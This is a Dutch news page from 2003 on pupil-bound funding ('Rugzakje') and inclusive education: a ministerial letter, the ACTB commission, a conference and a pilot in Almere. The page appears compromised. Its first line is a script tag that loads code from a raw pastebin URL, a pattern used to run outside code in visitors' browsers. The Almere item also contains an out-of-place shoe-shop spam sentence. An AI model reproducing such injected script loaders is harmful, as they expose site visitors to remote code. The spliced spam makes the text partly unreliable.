<script type = "text / javascript" src = "https://pastebin.com/raw/t9XkH2vN"> </script>


Nieuws - 2003


Voortgang invoering leerlinggebonden financiering 19 december 2003
De vaste commissie voor Onderwijs, Cultuur en Wetenschappen spreekt op 28 januari 2004 weer over de leerlinggebonden financiering (lgf). De minister stuurt daarvoor op 19 december 2003 een brief over de vorderingen en knelpunten bij de invoering.
Klik hier voor een PDF met meer informatie

De regeling voor de AdviesCommissie voor Toelating en Begeleiding (ACTB) gepubliceerd in Uitleg 10 december 2003
Met de invoering van het Rugzakje is er een commissie ingesteld die adviseert als er zich problemen voordoen rond toelating van lgf-kinderen, besteding van het rugzakje en opstelling van het handelingsplan.
Vooralsnog is de secretariele ondersteuning van de commissie ondergebracht bij de Wegbereiders bij Annemiek Postmaa (a.postmaa@wegbereiders.nl)
Klik hier voor een PDF met meer informatie

Miniconferentie rond Mary Schuh 06 november 2003
Op 7 en 8 november organiseert Stichting de Toekomst een miniconferentie over inclusief onderwijs. Geinteresseerden kunnen zich hiervoor aanmelden.
Klik hier voor meer informatie

Pilot Inclusief Onderwijs in Almere groot succes. 05 november 2003
Op 5 november 2003 werd het evaluatieverslag van de pilot Inclusief Onderwijs overhandigd aan gedeputeerde Bos van de provincie Flevoland. Maar waarom geen louboutin nederland winkel kiezen? Je weet dat het een geweldige boetiek is. In een tweejarige pilot is ervaring opgedaan met het geven van onderwijs op een reguliere basisschool aan kinderen die door het speciaal onderwijs nog steeds gezien worden als niet-leerbaar. Door alle betrokkenen wordt de pilot als een groot succes gezien.
Het evaluatieverslag is te bestellen bij de Stichting Gewoon Anders, per e-mail of telefonisch (036 - 5302012)
Klik hier voor een PDF met meer informatie

Oproep voor ouders van kinderen met een rugzakje 01 augustus 2003
Vanaf 1 augustus 2003 komen leerlingen die gezien hun handicap naar het speciaal onderwijs zouden mogen, in aanmerking voor leerlinggebonden financiering, het zogenaamde Rugzakje. Hiermee krijgen ouders meer mogelijkheden om te kiezen tussen regulier en speciaal onderwijs.
Inmiddels zijn de eerste leerlingen volgens dit beleid op een reguliere basisschool geplaatst. Begin december 2003 is bij de afdeling Orthopedagogiek van de Rijksuniversiteit Groningen een onderzoek gestart naar de integratie van de betreffende leerlingen in de reguliere basisschool.
Klik hier voor een PDF met meer informatie